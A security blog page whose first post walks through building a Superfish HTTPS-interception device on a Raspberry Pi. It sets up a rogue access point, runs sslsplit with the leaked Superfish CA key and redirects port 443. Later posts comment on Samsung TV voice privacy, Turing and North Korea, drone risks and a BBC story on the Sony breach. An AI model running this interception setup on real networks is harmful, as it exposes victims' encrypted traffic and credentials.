Robert Graham wrote a handy guide for a Superfish Exploit using Raspbian on a Raspberry Pi 2 (RP2). He mentioned wanting to run it on Kali instead so I decided to take that for a spin. Here are the steps. It took me about 20 minutes to get everything running.

A: Preparation of kali

1. Download kali image (462.5MB) provided by @essobi
2. Extract kali-0.1-rpi.img.xz – I used 7-zip

MD5: 277ac5f1cc2321728b2e5dcbf51ac7ef 
SHA-1: d45ddaf2b367ff5b153368df14b6a781cded09f6

3. Write kali-0.1-rpi.img to SD – I used Win32DiskImager
4. Insert the SD to RP2, connect network and power-up
5. SSH to kali using default user:password (root:toor)

B: Configuration of kali. In brief, I changed the default password and added a user account. I gave the new account sudo rights, then I logged out and back in as the new user. After that I updated kali for pi (rpi-update).

1. root@kali:~$ passwd
2. root@kali:~$ adduser davi
3. root@kali:~$ visudo
4. davi@kali:~$ sudo apt-get install curl
5. davi@kali:~$ sudo apt-get update && sudo apt-get upgrade
6. davi@kali:~$ sudo wget https://raw.githubusercontent.com/Hexxeh/rpi-update/master/rpi-update -O /usr/bin/rpi-update
7. davi@kali:~$ sudo chmod 755 /usr/bin/rpi-update
8. davi@kali:~$ sudo rpi-update
9. davi@kali:~$ sudo reboot

C: Configuration of network as Robert did – follow the elinux guide for details on how to edit the files.

1. davi@kali:~$ sudo apt-get install hostapd udhcpd
2. davi@kali:~$ sudo vi /etc/default/udhcpd
3. davi@kali:~$ sudo ifconfig wlan0 192.168.42.1
4. davi@kali:~$ sudo vi /etc/network/interfaces
5. davi@kali:~$ sudo vi /etc/hostapd/hostapd.conf
6. davi@kali:~$ sudo sh -c “echo 1 > /proc/sys/net/ipv4/ip_forward”
7. davi@kali:~$ sudo vi /etc/sysctl.conf
8. davi@kali:~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
9. davi@kali:~$ sudo iptables -A FORWARD -i eth0 -o wlan0 -m state –state RELATED,ESTABLISHED -j ACCEPT
10. davi@kali:~$ sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
11. davi@kali:~$ sudo sh -c “iptables-save > /etc/iptables.ipv4.nat”
12. davi@kali:~$ sudo vi /etc/network/interfaces
13. davi@kali:~$ sudo service hostapd start
14. davi@kali:~$ sudo service udhcpd start
15. davi@kali:~$ sudo update-rc.d hostapd enable
16. davi@kali:~$ sudo update-rc.d udhcpd enable

D: Configuration for Superfish Exploit. These commands follow Robert’s. I downloaded his test.pem file, duplicated it into a certificate file and then used vi to remove the redundant bits.

1. davi@kali:~$ wget https://github.com/robertdavidgraham/pemcrack/blob/master/test.pem
2. davi@kali:~$ cp test.pem ca.crt
3. davi@kali:~$ vi test.pem
4. davi@kali:~$ vi ca.crt
5. davi@kali:~$ openssl rsa -in test.pem -out ca.key
6. davi@kali:~$ sudo apt-get install sslsplit
7. davi@kali:~$ mkdir /var/log/sslsplit
8. davi@kali:~$ sslsplit -D -l connections.log -S /var/log/sslsplit -k ca.key -c ca.crt ssl 0.0.0.0 8443 &
9. davi@kali:~$ sudo iptables -t nat -A PREROUTING -p tcp –dport 443 -j REDIRECT –to-ports 8443

Obviously Robert did all the hard work figuring this out. I’ve just tested the basics to see what it would take to setup a Kali instance. If I test further or script it I’ll update this page. Also perhaps I should mention I have a couple hardware differences from Robert’s guide:

• RP2. Cost: $35
• 32GB SanDisk micro SD (which is FAR larger than necessary). Cost: $18
• Rosewill RNX-N180UBE wireless USB with external antenna, able to do “infrastructure mode”. Cost $21

Total cost: (re-purposed from other projects) $35 + $18 + 21 = $74
Total time: 20 minutes

Because I used such a large SD card, and the Kali image was so small, I also resized the partitions to make use of all that extra space.

Check starting use percentages:

• davi@kali:~$ df -k

Filesystem     1K-blocks    Used Available Use% Mounted on
rootfs           2896624 1664684   1065084  61% /
/dev/root        2896624 1664684   1065084  61% /
devtmpfs          470368       0    470368   0% /dev
tmpfs              94936     460     94476   1% /run
tmpfs               5120       0      5120   0% /run/lock
tmpfs             189860       0    189860   0% /run/shm

Resize the partition

1. davi@kali:~$ sudo fdisk /dev/mmcblk0
2. type “p” (print partition table and NOTE START NUMBER FOR PARTITION 2)
3. type “d” (delete partition)
4. type “2” (second partition)
5. type “n” (new partition)
6. type “p” (primary partition)
7. type “2” (second partition)
8. hit “enter” to select default start number (SHOULD MATCH START NUMBER NOTED)
9. hit “enter” to select default end number
10. type “w” (write partition table)
11. davi@kali:~$ sudo reboot
12. davi@kali:~$ sudo resize2fs /dev/mmcblk0p2

Check finished use percentages:

• davi@kali:~$ df -k

Filesystem     1K-blocks    Used Available Use% Mounted on
rootfs          30549476 1668420  27590636   6% /
/dev/root       30549476 1668420  27590636   6% /
devtmpfs          470368       0    470368   0% /dev
tmpfs              94936     464     94472   1% /run
tmpfs               5120       0      5120   0% /run/lock
tmpfs             189860       0    189860   0% /run/shm

Samsung is in a bit of a pickle. They want people to know that “voice recognition feature is activated using the TV’s remote control”. But let’s face it their disclaimer/warning that comes with a TV gave away the real story:

You can control your SmartTV, and use many of its features, with voice commands.

If you enable Voice Recognition, you can interact with your Smart TV using your voice. To provide you the Voice Recognition feature, some voice commands may be transmitted (along with information about your device, including device identifiers) to a third-party service that converts speech to text or to the extent necessary to provide the Voice Recognition features to you. In addition, Samsung may collect and your device may capture voice commands and associated texts so that we can provide you with Voice Recognition features and evaluate and improve the features. Please be aware that if your spoken words include personal or other sensitive information, that information will be among the data captured and transmitted to a third party through your use of Voice Recognition.

Nice attempt at raising awareness. Kudos for that. The first thing that jumps out at me is how vague the terms are. Second I noticed controls appear to be weak, or at least buried in some menu somewhere (“activated using your remote!” is basically meaningless). Third, Samsung clearly tries to dissuade you from disabling voice monitoring.

If you do not enable Voice Recognition, you will not be able to use interactive voice recognition features, although you may be able to control your TV using certain predefined voice commands. While Samsung will not collect your spoken word, Samsung may still collect associated texts and other usage data so that we can evaluate the performance of the feature and improve it.

You may disable Voice Recognition data collection at any time by visiting the “settings” menu. However, this may prevent you from using all of the Voice Recognition features.

So that’s a warning that your data can go somewhere, who knows where. On the other hand if you disable data collection you may be prevented from using all the features. Don’t you want all the features? Awful choice we have to make.

Samsung product management should be held accountable for a triad of failures. Really, a TV product manager should be in serious hot water. It is embarrassing in 2015 for a consumer product company of any size to make this large a mistake. We faced these issues at Yahoo product security ten years ago and I am seriously disappointed in Samsung. That also is why I find growing public outrage encouraging.

Yahoo! 2006 “Connected Life” Internet TV device

At Yahoo we had a large team focused on user privacy and safety. Research on Internet TV found novelty in a shared device with individual user privacy needs. On the mobile phone product managers could tell me “there is always only one user” and we would debate multi-user protections. But on the TV, oh the TV was different: multi-user risks were obvious to product managers and it was easy for them to take notice. The outrage against Samsung was easily predictable and avoidable.

Take for example typing your password on a big screen menu in front of a room. Everyone can see. The solution I created a decade ago was based on a simple concept: move user information to a disposable/agile security model instead of an expensive/static one. We developed a throwaway token option to register an account on the big screen instead of asking for a sensitive password.

Type your password into a private system, such as a laptop or phone, and the system sends you a number. You enter that number into the TV. Doesn’t matter if anyone sees the number. That was 2006 as we worked with TV manufacturers on how to keep data in public rooms on shared devices private. Yahoo dominated the Internet share of accounts (2 billion users) around this time so nearly every manufacturer would come through our process. Thus we could try to consult with them before bad code or devices were released.

Samsung should thought this through better on their own by now. For example commands used for the TV could require a keyword to “markup” listening, such as “Hello Samsung” and “Goodbye”. That phrase is basically never going to come up in casual conversation. Phones already do this. Remember CB radio? Lots of good verbal markup ideas there and who wouldn’t enjoy talking to their TV like a trucker?

Also important is visual indication that the TV is listening, such as an annoyingly bright LED that can’t be missed. And third a physical disable switch with tactic and visual feedback would be nice; like switching off an old Marshall amplifier. Perhaps a switch on the remote or a button that lights up like a big red “recording” indicator. And this doesn’t even get into fun answers to how the data is protected in memory, storage and over the wire.

Unfortunately Samsung just gave themselves a black eye instead. I would not buy another product from them until I have hard evidence their product management runs through a legitimate security team/review process. In fact I am now disposing of the Samsung device I did own and there’s a very high chance of migrating to another manufacturer.

Just for some comparison, notice how the camera and facial recognition were described:

Vague:

Your SmartTV is equipped with a camera that enables certain advanced features, including the ability to control and interact with your TV with gestures and to use facial recognition technology to authenticate your Samsung Account on your TV. The camera can be covered and disabled at any time, but be aware that these advanced services will not be available if the camera is disabled.

Specific:

The camera situated on the SmartTV also enables you to authenticate your Samsung Account or to log into certain services using facial recognition technology. You can use facial recognition instead of, or as a supplementary security measure in addition to, manually inputting your password. Once you complete the steps required to set up facial recognition, an image of your face is stored locally on your TV; it is not transmitted to Samsung. If you cancel your Samsung Account or no longer desire to use facial recognition, please visit the applicable settings menu to delete the stored image. While your image will be stored locally, Samsung may take note of the fact that you have set up the feature and collect information about when and how the feature is used so that we can evaluate the performance of this feature and improve it.

Updated Feb 23: David Lodge has dumped the network traffic and proved that it is indeed capturing and sending unencrypted text to Samsung. He writes:

What we see here is not SSL encrypted data. It’s not even HTTP data, it’s a mix of XML and some custom binary data packet.

The sneaky swines; they’re using 443/tcp to tunnel data over; most likely because a lot of standard firewall configurations allow 80 and 443 out of the network. I don’t understand why they don’t encapsulate it in HTTP(S) though.

Anyway, what we can see is it sending a load of information over the wire about the TV, I can see its MAC address and the version of the OS in use. After the word buffer_id is a load of binary data, which looks audio-ish, although I haven’t delved further into it yet.

Then, right at the bottom, we have the results:

In private circles I was agitating for a while on the humanitarian crisis in North Korea. Although I have collected a bit of data and insights over the years it just hasn’t seemed like the sort of thing people were interested in or asking about. Not exactly good conversation material.

Then earlier this year I was at Bletchley Park and reading about Alan Turing. A quote of his prompted me to post my thoughts here on North Korea’s humanitarian crisis. Turing said basically (paraphrasing)

I helped my country defeat the Nazis, who used chemical castration to torture people including gays and Jews. In 1952 my country wants to give me the same treatment as a form of “managing” gays.

Turing’s life story was not well known until long after he died. And as we learn more about his tragic end it turns out despite exceptional service to his country he was horribly misunderstood and mistreated. He fought to preserve dignity against spurious charges; his social life and personal preferences caused him much trouble with British authorities. Turing was under constant surveillance and driven into horrible despair. After suffering effects of chemical castration, required by a court order, he committed suicide.

I’ll write more about the Turing incident on another post. Suffice it to say here that in the 1950s there was an intense fear-mongering climate against “gay communist” England. Thousands of men were sent to prison or chemically castrated without any reasonable cause.

Between 1945 and 1955 the number of annual prosecutions for homosexual behaviour rose from 800 to 2,500, of whom 1,000 received custodial sentences. Wolfenden found that in 1955 30% of those prosecuted were imprisoned.

The English enacted horrible treatment, even torture, to gay men for what end exactly? Turing was baffled at being arrested for “gross indecency” not least of all because just ten years earlier he had helped his country fight to protect people against such treatment. A gruesome early death was predictable for those monitored and questioned by police, even without charges.

The reform activist Antony Grey quotes the case of police enquiries in Evesham in 1956, which were followed by one man gassing himself, one throwing himself under a train, leaving widow and children, and an 81 year old dying of a stroke before sentence could be passed.

Why do I mention this? Think about the heavily politicized reports written by Mandiant or Crowdstrike. We see China, Russia and Iran accused of terrible things as if we only should look elsewhere for harm. If you are working for one of these companies today and do not think it possible things you care about abroad could happen at home, this post is for you. I recommend you consider how Turing felt betrayed by the country he helped defend.

Given Turing’s suffering can we think more universally, more forward? Wouldn’t that serve to improve moral high-ground and justifications for our actions?

Americans looking at North Korea often say they are shocked and saddened about treatment of prisoners there. I’ll give a quick example. Years ago in a Palo Alto, California a colleague recommended a book he had just finished. He said it proved without a doubt how horrible communism fails and causes starvation, unlike our capitalism that brings joy and abundance. The obvious touch of naive free-market fervor was bleeding through so I questioned whether we should trust single-source defection stories. I asked how we might verify such data when access was closed.

I ran straight into the shock and disgust of someone as if I were excusing torture, or justifying famine. How dare I question accusations about communism, the root of evil? How dare I doubt the testimony of an escapee who suffered so much to bring us truth about immorality behind closed doors? Clearly I did not understand free market superiority, which this book was really about. Our good must triumph over their evil. Did I not see the obviously worst type of government in the world? The conversation clouded quickly with him reiterating confidence in market theory and me causing grief by asking if that survivor story was sound or complete on its own.

More recent news fortunately has brought a more balanced story than the material we discussed back then. It has become easier to discuss humanitarian crisis at a logical level since more data is available with more opportunity for analysis. Even so, the Associated Press points out that despite thousands of testimonials we still have an incomplete picture from North Korea and no hard estimates.

The main source of information about the prison camps and the conditions inside is the nearly 25,000 defectors living in South Korea, the majority of whom arrived over the last five years. Researchers admit their picture is incomplete at best, and there is reason for some caution when assessing defector accounts.

I noticed the core of the problem when watching Camp 14. This is a movie that uses first-person testimony from a camp survivor to give insights into conditions of North Korea. Testimony is presented as proof of one thing: the most awful death camps imaginable. Camp workers are also interviewed to back up the protagonist story. However a cautious observer would also notice the survivor’s view has notable gaps and questionable basis.

The survivor, who was born in the prison, says he became enraged with jealously when he discovered his mother helping his older brother. He turned in his own mother to camp authorities. That is horrible in and of itself but he goes on to say he thought he could negotiate better treatment for himself by undermining his family. Later he wonders in front of the camera whether as a young boy he might have mis-heard or mis-understood his mother; wonders if he sent his own mother to be executed in front of him without reason other than to improve his own situation.

The survivor also says one day much later he started talking to a prisoner who came from the outside, a place that sounded like a better world. The survivor plots an escape with this prisoner. The prisoner from the outside then is electrocuted upon touching the perimeter fence; the survivor climbs over the prisoner’s body, using it as insulation to free himself.

These are just a couple examples (role of his father is another, old man who rehabilitated him is another) that jumped out at me as informational in a different way than perhaps was intended. This is a survivor who describes manipulation for his own gain at the expense of others, while others in his story seem to be helping each other and working towards overall gains.

I’ve watched a lot of survivor story videos and met in person with prison camp survivors. Camp 14 did not in any way sound like trustworthy testimony. I gave it benefit of the doubt while wondering if we would hear stories of the others, those who were not just opportunists. My concern was this survivor comes across like a trickster who knows how to wiggle for self-benefit regardless of harm or disrespect to those around. Would we really treat this story as our best evidence?

The answer came when major elements of his stories appeared to have been formally disputed. He quickly said others were the ones making up their stories; he then stepped away from the light.

CNN has not been able to reach Shin, who noted in a Facebook post apologizing for the inaccuracies in his story that “these will be my final words and this will likely be my final post.”

My concern is that outsiders looking for evidence of evil in North Korea will wave hands over facts and try to claim exceptional circumstances. It may be exceptional yet without caution someone could quickly make false assumptions about the cause of suffering and act on false pretense, actually increasing the problem or causing worse outcomes. The complicated nature of the problem deserves more scrutiny than easy vilification based on stale reports from those in a position to gain the most.

One example of how this plays out was seen in a NYT story about North Korean soldiers attacking Chinese along border towns. A reporter suggested soldiers today are desperate for food because of a famine 20 years ago. The story simply did not add up as told. Everything in the story suggested to me the attackers wanted status items, such as cash and technology. Certain types of food also may carry status but the story did not really seem to be about food to relieve famine, to compensate for communist market failure.

Thinking back to Turing, how do we develop a logical framework let alone a universal one, to frame ethical issues around intervention against North Korea? Are we starting with the right assumptions as well as keeping an open mind on solutions?

While we can dig for details to shame North Korea for its prison culture we also must consider the International Centre for Prison Studies ranks the United States second only to the Seychelles in per-capita incarceration rate (North Korea is not listed). According to 2012 data almost 1% of all US citizens are in prison. Americans should think about what prison quantitative analysis shows, such as here:

There also are awful qualitative accounts from inside the prisons, such as the sickening Miami testimony by a former worker about killing prisoners through torture, and prisoner convictions turning up to have zero integrity.

Human Rights Watch asked “How Different are US Prisons” given that federal judges have called them a “culture of sadistic and malicious violence”. Someone even wrote a post claiming half of the world’s worst prisons are in the US (again, North Korea is not listed).

And new studies tell us American county jails are run as debtor prisons; full of people guilty of very minor crimes yet kept behind bars by court-created debt.

Those issues are not lost to me as I read the UN Report of the Commission of Inquiry on Human Rights in the Democratic People’s Republic of Korea. Hundreds of pages give detailed documentation of widespread humanitarian suffering.

Maintaining a humanitarian approach, a universal theory of justice, seems like a good way to keep ourselves grounded as we wade into understanding crisis. To avoid the Turing disaster we must keep in mind where we are coming from as well as where we want others to go.

Take for example new evidence from a system where police arrest people for minor infractions and hold them in fear and against their will, in poor conditions without representation. I’ll let you guess where such a system exists right now:

They are kept in overcrowded cells; they are denied toothbrushes, toothpaste, and soap; they are subjected to the constant stench of excrement and refuse in their congested cells; they are surrounded by walls smeared with mucus and blood; they are kept in the same clothes for days and weeks without access to laundry or clean underwear; they step on top of other inmates, whose bodies cover nearly the entire uncleaned cell floor, in order to access a single shared toilet that the city does not clean; they develop untreated illnesses and infections in open wounds that spread to other inmates; they endure days and weeks without being allowed to use the moldy shower; their filthy bodies huddle in cold temperatures with a single thin blanket even as they beg guards for warm blankets; they are not given adequate hygiene products for menstruation; they are routinely denied vital medical care and prescription medication, even when their families beg to be allowed to bring medication to the jail; they are provided food so insufficient and lacking in nutrition that inmates lose significant amounts of weight; they suffer from dehydration out of fear of drinking foul-smelling water that comes from an apparatus on top of the toilet; and they must listen to the screams of other inmates languishing from unattended medical issues as they sit in their cells without access to books, legal materials, television, or natural light. Perhaps worst of all, they do not know when they will be allowed to leave.

And in case that example is too fresh, too recent with too little known, here is a well researched look at events sixty years ago:

…our research confirms that many victims of terror lynchings were murdered with out being accused of any crime; they were killed for minor social transgressions or for demanding basic rights and fair treatment.
[…]
…in all of the subject states, we observed that there is an astonishing absence of any effort to acknowledge, discuss, or address lynching. Many of the communities where lynchings took place have gone to great lengths to erect markers and monuments that memorialize the Civil War, the Confederacy, and historical events during which local power was violently reclaimed by white Southerners. These communities celebrate and honor the architects of racial subordination and political leaders known for their belief in white supremacy. There are very few monuments or memorials that address the history and legacy of lynching in particular or the struggle for racial equality more generally. Most communities do not actively or visibly recognize how their race relations were shaped by terror lynching.
[…]
That the death penalty’s roots are sunk deep in the legacy of lynching is evidenced by the fact that public executions to mollify the mob continued after the practice was legally banned.

The cultural relativity issues of our conflict with North Korea are something I really haven’t seen anyone talking about anywhere, although it seems like something that needs attention. Maybe I just am not in the right circles.

Perhaps I can put it in terms of a slightly less serious topic.

I often see people mocking North Korea for a lack of power and for living in the dark. Meanwhile I never see people connect lack of power to a June 1952 American bombing campaign that knocked out 90% of North Korea’s power infrastructure. This is not to say bomb attacks from sixty years ago and modern fears of dependency on infrastructure are directly related. It is far more complex.

However it stands to reason that a country in fear of infrastructure attacks will encourage resiliency and their culture shifts accordingly. A selfish dictator may also encourage resiliency to hoard power, greatly complicating analysis. Still I think Americans may over-estimate the future for past models of inefficiencies and dependency on centralized power. North Korea, or Cuba for that matter, could end up being global leaders as they figure out new decentralized and more sustainable infrastructure systems.

Sixty years ago the Las Vegas strip glare and consumption would be a marvel of technology, a show of great power. Today it seems more like an extravagant waste, an annoyance just preventing us from studying the far more beautiful night sky full of stars that need no power.

Does this future sound too Amish? Or are you one of the people ranking the night sky photos so highly that they reach most popular status on all the social sites? Here’s a typical 98.4% “pulse” photo on 500px:

Night at the Lake by hipydeus

Imagine what Google Glass enhanced for night-vision would be like as a new model. Imagine the things we would see if we reversed from street lights everywhere, shifting away from cables to power plants, and went towards a more generally sustainable/resilient goal of localized power and night vision. Imagine driving without the distraction of headlights at night, with an ability to see anyway, as military drivers around the world have been trained…

I’ll leave it at that for now. So there you have a few thoughts on humanitarian crisis, not entirely complete, spurred by a comment by Turing. As I said earlier, if you are working at Mandiant or Crowdstrike please think carefully about his story. Thanks for reading.

Have you heard the story about a drone that crashed into the White House yard?

Wired has done a follow-up story, drawing from a conference to discuss drone risks.

The conference was open to civilians, but explicitly closed to the press. One attendee described it as an eye-opener.

Laughably Wired seems to quote just one anonymous attendee as payback for lack of access to the event. Who was this attendee? Why was it an eye-opener?

In my conference talks for the past few years I explicitly mentioned attacks on auto-auto (self-driving cars) based on our fiddling with drones. Perhaps we are not getting much attention, despite doing our best to open eyes. Instead of some really scary stuff the Wired perspective looks only at a very limited and tired example.

But the most striking visual aid was on an exhibit table outside the auditorium, where a buffet of low-cost drones had been converted into simulated flying bombs. One quadcopter, strapped to 3 pounds of inert explosive, was a DJI Phantom 2, a newer version of the very drone that would land at the White House the next week.

Ok, surely that’s not the most striking visual aid. I would be happy to give any journalist multiple reasons why a drone with 3 pounds of explosive does not present the most difficult defensive situation. In fact on the scale of things I would want to build defenses against, a bomb drone seems very easily within reach. There are far, far more troubling ones, which is why I have been giving presentations on the risks and what defenders could do to about them (Blackhat, CONFidence).

We also have tweeted about taking over the skyjack drone by manipulating its attack script flaw, essentially a mistake in radio logic. A drone on autopilot using a mapped GPS would be straightforward to defeat, which we also have had some fun discussions about, at least in terms of ships (flying in water, get it?). And then there is Lidar jamming…

Anyway back in April of 2014 I had tweeted about DJI drone controls and no waypoint zones. The drone company was expressing a clear global need to steer clear of airports. Thought I should call attention to our 2014 research and this detail as soon as I saw the White House news so I replied to some tweets.

Nine retweets!? Either I was having a good day or the White House raises people’s attention level. Maybe we can blow off all our talking about this in the past because someone just flew a drone into the wrong yard. It’s a whole new ballgame of awareness. While the White House drone incident could cause a backlash on drone manufacturers for lack of zone controls, the incident also brings a much needed inflection point at the highest and broadest levels, which is long overdue.

Our culture tends to leave the market to harm the average person because let them figure it out. Once a top-dog, a celebrity with everything, is harmed or threatened then things get real. It is like we say “if they can’t defend, no one could” and so the regulatory wheels start to spin.

An incident with zero impact that can raise awareness sounds great to me. As I explained to a FCC Commissioner last year, American regulation is driven by celebrity events. This one was pretty close and may get us some good discussion points. That is why I see this incident finally bringing together at least three phases of drone enthusiast. Fresh and new people will be stepping into the ring to tinker and offer innovative solutions; old military and scientific establishment folks (albeit with some VIP nonsense and closed-door snafus) will come out of the woodwork to ask for a place in the market; and of course those who have been fiddling away for a while without much notice will take a deep-breath, write a blog post and wonder who will read it this time.

Three drone enthusiast profiles

Last year I sauntered into a night-time drone meetup in San Francisco. It was sponsored by a high-powered east-coast pseudo-governance organization. And when I say drone meetup, I am not just talking about the lobbyist drone in fancy clothes who talked about bringing “community” closer to the defense industry “shared-objectives” (“you are getting very sleepy”). I am talking about a room stuffed with people interested in pushing technology boundaries, mostly in the air. Several observations about that meetup I would like to share here. Roughly speaking I found the audience fit into these interest levels:

• Profile 1: The hobbyists seemed easily annoyed by thinking about risks. This is typical in technology meetups that bring developers together. Some people look at the clouds above the picnic, some look at the ants. The new drone meetups almost always are filled with cloud watchers.
  Others would ask me “what’s your rig” or “what do you pilot” to talk shop. I would reply “Sorry, not a pilot, I study using ground control to remove drones from the air”. This went over like a lead balloon. You could sense the deflation in mood.
  When I was asked “why would anyone want to do that” my response was “I have no idea. There are so many possible reasons.” My area of study is not focused on why. I want to know how. So I told people “When somebody decides why a drone needs to be stopped, I would like us to avoid any panic about how.”
  Although the hobbyists had some amazing ideas about drones changing the world for the better, I was doing my duty to ask “why” and “is that safe” at strategic points in the conversation.
• Profile 2: The professionals were swapping stories about success and failures in the ancient past. This crowd was jaded already. As per usual those with field-experience had a veritable gold-mine of lessons not widely shared. A favorite of mine was when a guy who built private gas-leak drones made them “too accurate”. He forced the power company (PG&E) to admit their existing sensors (mostly manual, staff in vehicles) were dangerously out-dated. Better sensor technology was meant to be a sales strategy for this drone professional yet the quality gap he opened between old and new was so large PG&E was angry; fought back instead of buying-in.
  Another great story was when a drone had flown throughout mines and laser-mapped them. Software stitching together photos with maps, using a large cloud compute cluster, inexpensively created a 3D world of a hazardous cave to be enhanced with environmental details. New business models were being explored around providing geology maps to FPS gaming companies, or architects planning new construction. Want to see how your new underground restaurant looks at 5:30PM as the sun sets, or with a morning rain-storm? Click, click now you can walk through, just like a drone already has.
  Another was pure surveillance, although the story was told as “tourism”. Go to visit a monument, take a few photos. Nice. Now pull out your pocket drone, take a few thousand pictures and have a perfect 3D model you can replicate later. Throw up a drone on a specific route to 3D map anything. Statues, machines, buildings…it comes back with data you download, process and can use to build or model perfectly anything the drone “sees” on its little vacation. Since the processing story was last year I have to also point out this year drones started processing all the data in real-time as they fly.
• Profile 3: The lobbyist was annoyed about risks like the hobbyists, although she blended in hard-lessons from Profile 2. It was bridging reality of risks with promise of new sales.
  She was of the opinion that the US military was light-years ahead of hobbyists in drone-building and flying. Been there done that, they had forged a business model and their engineers therefore should rule the technology leadership roost into the next business models. However she came to SF to openly admit the military-industrial-complex has become so used to handouts from government they felt a bit worried about missing the boat on consumer markets.
  Someone recognized a strong Profile 2 (seasoned story-telling) had been missing from their lobbyist toolkit for the coming commercial boom. A flood of new talent was scooping up drone kits and toys, quickly threatening to dwarf the proprietary market cap. The lobbyist was talking about synergies and collaborations. Although let’s be honest, she is a lobbyist. She also was testing the water for an exit from big old federal government money into even bigger global commercial money. She just didn’t know yet who she should focus her pleadings on most.

You could smell a three-way collision (at least, maybe more) brewing and bubbling, yet groups still stood far apart at this meetup. Political stakes were increasing: money and ideas starting to flow, old power brokers worried about disruption, combined with seasoned vets sprinkling around guidance on where to go with the technology and new horizons. This is how things have evolved for many years; it just didn’t seem quite yet the time for collaboration.

Bringing Profiles Together

Going way, way back, I remember as a child when my grandfather handed me a drone he had built (mostly ruined, actually, but let’s just pretend he made it better). Having a grandfather who built drones did not seem all that special. Model trains, airplanes, boats…all that I figured to be the purview of old people fascinated with making big technology smaller so they could play with it. Kind of like the bonzai effect, I guess. I fast-forward to today and I realize he might have been a little exceptional. Groups everywhere growing consistently larger and more committed to drones, albeit they seem separate and distinct from each other, not part of everyday life.

As popularity increases, so does the question of how all the pieces and parties should work together better. Roombas aside, my theory is the future looks incredibly bright if people start working together on ethics and politics in the bigger picture, including risks. I wasn’t going to fall for the Profile 3 lobbyist pitch (who was?). However, I was excited by some of the groups and discussions.

Speaking of way back, in 2013 I found my long-time drone interests leading into tweets useful at work. I thought Twitter might help with converging risk discussions into after-hours meetups, like talking about the forward-thinking people in Iowa demanding no-drone zones.

Clearly my humor did not win anyone’s attention. Not a single retweet or favorite. Crickets.

It also may just be that Twitter sucks as a platform and I have no followers. That’s probably why I’m back to blogging again more. Does anyone find Tweets conducive to real conversation? The best Twitter seems to do for me is to shift conversation by allowing me to throw a fact in here or there, like I sit quietly with my remote Twitter control, every so often dropping stones into the Twitter pond.

When a news story broke in 2013 I had to jump in and say “hey, cool Amazon hobbyist (new) story and I think you could be overlooking a FedEx lobbyist (old) story”.

I was poking around some loopholes too, wondering whether the drones over SF could have a get-out-of-jail card if we wanted to take them down.

Kudos to Sina and Jack for the conversation. My tweets were at least reaching two or three people at this point.

And as anti-drone laws were popping up I occasionally would mention my research in public. Alaska wanted a law to make sure hunters could not use drones for unfair advantage.

Such a rule seemed ironic, considering how guns have made killing a “sport” nearly anyone can “play”. A completely unbalanced and technology-laden air/ground/sea attack strategy on nature was common talk, at least when I was in Alaska. Anyway someone thought drones were taking an already automated sport of killing too far.

Illinois took the opposite approach to Alaska. Someone saw drones as potential interference to those out for a killing.

By April of 2014 I had built up a fair amount of detail on no-fly zones and strategies. We ran drones for testing and anti-drone antenna prototypes were being discussed. I gave myself a challenge: get a talk accepted and then publish an anti-drone device, similar to anti-aircraft, for the hobbyist or average home user.

Here’s a good picture of where I was coming from on this idea. One of the top drone manufacturers was telling me their drones were absolutely not going to stray into no-fly zones. What if they did anyway? Ethics were easy in this space. A system to respond seemed most clearly justified.

Haha. “No-way points” get it? No? That’s ok, no one did. Not a single re-tweet or favorite for that map. It wasn’t completely lost on people, however. A little exposure meant I was called in for a short Loopcast episode, called Drone Hacking, which I suppose a few people might have heard. The counter says 162,000 plays so far, which seems impossible. Maybe drones are listening.

Anyway my big plan to release our research at a conference was knocked down when the Infiltrate voting system denied us a spot. We were going to show how we immediately, and I mean immediately, found a way to take-over the Skyjack drones. We wanted to talk about command and control, redirection and all kinds of fun stuff. Denied.

I resubmitted the same ideas to CanSecWest and again was denied. This pretty-much shelved my excitement to explain more details and spend time in a formal public space. After all, my focus was more on the larger picture of big data and less on individual sensors. That’s why you’ll see drone information woven into in my big data security talks and writings.

Although at last year’s EMCworld I put a guy on my staff dedicated to drones — running a bunch of cool tests and achieving real pilot skills — it still wasn’t brought out publicly as much as I would have liked. Timing still felt early, as if journalists were apprehensive and various groups too separated to generate a nice broad and general audience story. Our conference was explicitly open to the press yet we were without any major celebrity-level disaster driving attendees. Maybe this year…

A BBC business story on the Sony breach flew across my screen today. Normally I would read through and be on my way. This story however was so riddled with strange and simple errors I had to stop and wonder; who really reads this without pause? Perhaps we need a Snopes of theories on hackers.

A few examples

Government-backed attackers have far greater resources at their disposal than criminal hacker gangs…

False. Criminal hacker gangs can amass far greater resources more quickly than government-backed ones. Consider how criminal gangs operate relative to the restrictions of the “governed”. Government-backed groups have constraints on budget, accountability, jurisdiction…. I am reminded of the Secret Service agent who told me how he had to scrape and toil for months to bring together an international team with resources and approval. Finally getting approval his group descended in a helicopter onto the helipad of a criminal property that was literally a massive gilded castle surrounded by exotic animals and vehicles. Gov agencies were outclassed on almost every level yet careful planning, working together and correct timing were on their side. The bust was successful despite strained resources across several countries.

Of course it is easy to find opposite examples. The government invests in the best equipment to prepare for some events and clearly we see “defense” budgets swell. This is not the point. In many scenarios of emerging technology you find innovation and resources are handled better by criminal gangs who lack constraints of being governed — criminals can be as lavish or unreasonable as they decide. Have you noticed anyone lately talking about how Apple or Google have more money than Russia?

Government-backed hackers simply won’t give up…

False. This should be self-evident from the answer above. Limited resources and even regime change are some of the obvious reasons why government-backed anything will give up. In the context of North Korea, let alone wider history of conflict, we only have to look at a definition of the current armistice that is in place: “formal agreement of warring parties to stop fighting”.

Two government-backed sides in Korea formally “gave up” and signed an armistice agreement July 27, 1953. At 10 a.m..

Perhaps some will not like this example because North Korea is notorious for nullifying the armistice as a negotiation tactic. Constant reminders of its intent for reunification seem like it has refused to give up. I’d disagree, on the principle of what armistice means. Even so let’s consider instead the U.S. role in Vietnam. On January 27, 1973 an “Ending the War and Restoring Peace in Viet-Nam” Agreement was signed by the U.S. and others in conflict; by the end of 1973 the U.S. had unquestionably given up attacks and three years later North and South were united.

I also am tempted to point to famous pirates (Ching Shih or Peter Easton) who “gave up” after a career of being sponsored by various states to attack others. They simply inked a deal with one sponsor to retire.

“What you need is a bulkhead approach like in a ship: if the hull gets breached you can close the bulkhead and limit the damage…

True with Serious Warning. To put it simply, bulkheads are a tool, not a complete solution. This is the exact mistake that led to the Titanic disaster. A series of bulkheads (with some fancy new technology hand-waving of the time) were meant to keep the ship safe even when breached. This led people to refer to the design as “unsinkable”. So if the Titanic sank how can bulkheads still be a thing to praise?

